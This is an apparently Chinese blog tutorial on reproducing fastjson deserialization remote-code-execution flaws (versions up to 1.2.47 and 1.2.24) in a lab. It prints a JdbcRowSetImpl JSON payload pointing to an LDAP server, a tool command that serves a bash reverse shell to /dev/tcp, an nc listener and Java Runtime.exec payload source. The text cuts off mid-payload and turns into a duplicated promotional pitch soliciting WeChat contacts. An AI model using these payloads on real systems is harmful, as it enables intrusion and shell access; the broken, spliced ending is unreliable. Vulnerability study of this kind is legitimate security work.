fastjson反序列化漏洞，2024年最新附面试答案

fastjson反序列化漏洞

文章目录

• fastjson反序列化漏洞
• • 1.漏洞原理

• 2.探测方式
• • 2.1 查看回显

• 2.2 LDAP/RMI服务测试

• 3.LDAP/RMI服务搭建要求
• 4.漏洞复现
• • 4.1 fastjson <=1.2.47 反序列化导致任意命令执行漏洞

• • 4.1.1 环境准备

• 4.1.2 复现过程

• 4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞
• • 4.2.1 环境准备

• 4.2.2 复现过程

• 4.3 fastjson即时回显利用
• • • 前情提要

• 漏洞复现

1.漏洞原理

​ Fastjson是一款开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

​ fastjson反序列化与weblogic、shiro反序列化类似，在客户端将json数据进行序列化传送至服务端后，服务端会将其反序列化读取其中数据，若客户端操控json数据，加入一些恶意类方法、代码，则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式，也存在着被绕过的风险。

​ 当前出现的fastjson反序列化漏洞由于无法做到回显，一般会使用ldap和rmi远程调用的方式来进行getshell。攻击机发送恶意payload来使漏洞服务端进行ldap或rmi远程调用，调用搭建好的ldap或rmi服务上所布置好的class类进而执行，从而实现shell反弹。

2.探测方式

2.1 查看回显

当提交一个json数据时，可以故意截取数据内容，使其不完整，再查看服务器返回包内容是否写有fastjson

例如：

删去括号使其不完整，便出现了fastjson

2.2 LDAP/RMI服务测试

利用github上已经编译好的jar利用包，在VPS上启动ldap服务来构造payload来使服务端请求dnslog探测是否存在漏洞。

java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.155.128 80 “curl sr7wx4.dnslog.cn”

利用所提供的payload进行dnslog

POST / HTTP/1.1
Host: 192.168.155.128:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN
Connection: close
Content-Length: 187
Content-Type:application/json

{“e”:{“@type”:“java.lang.Class”,“val”:“com.sun.rowset.JdbcRowSetImpl”},“f”:{“@type”:“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://192.168.155.128:80/Object”,“autoCommit”:true}}

平台成功接收，证明存在漏洞

3.LDAP/RMI服务搭建要求

4.漏洞复现

4.1 fastjson <=1.2.47 反序列化导致任意命令执行漏洞

4.1.1 环境准备

攻击机：win10 burp

vps：java python nc

靶机：kali

（条件有限vps上要搭建的东西移到了同为靶机的kali上）

4.1.2 复现过程

启动nc来进行监听，端口为4444

nc -ltvp 4444

此时启动jar包，该包专为1.2.47版本使用，利用该包启动ldap服务，前段ip为ldap服务ip及端口，后段为nc监听ip及端口。（https://github.com/wyzxxz/fastjson_rce_tool）

java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.155.128 81 “bash=/bin/bash -i >& /dev/tcp/192.168.155.128/4444 0>&1”
同样可以修改参数为fastjson.EvilRMIServer，启动RMI服务

返回payload，利用post方式将其发送至靶机服务端，同时Content-Type类型为application/json。

查看nc，已经接收到反弹的shell了

4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞

4.2.1 环境准备

攻击机：win10 burp

vps：java python nc

靶机：kali

（条件有限vps上要搭建的东西移到了同为靶机的kali上）

4.2.2 复现过程

由于该版本没有专用的jar包需要自己进行编译。

首先编译远程调用的java文件（建议使用jdk1.8编译，其他版本编译出来的可能会不执行）

payload如下：
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {“touch”, “/tmp/success”};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e)
{
// do nothing
}
}
}
反弹shellpayload
// javac TouchFile.java
import java.lang.Runtime;

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。**

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-4WjFXHla-1712660029563)]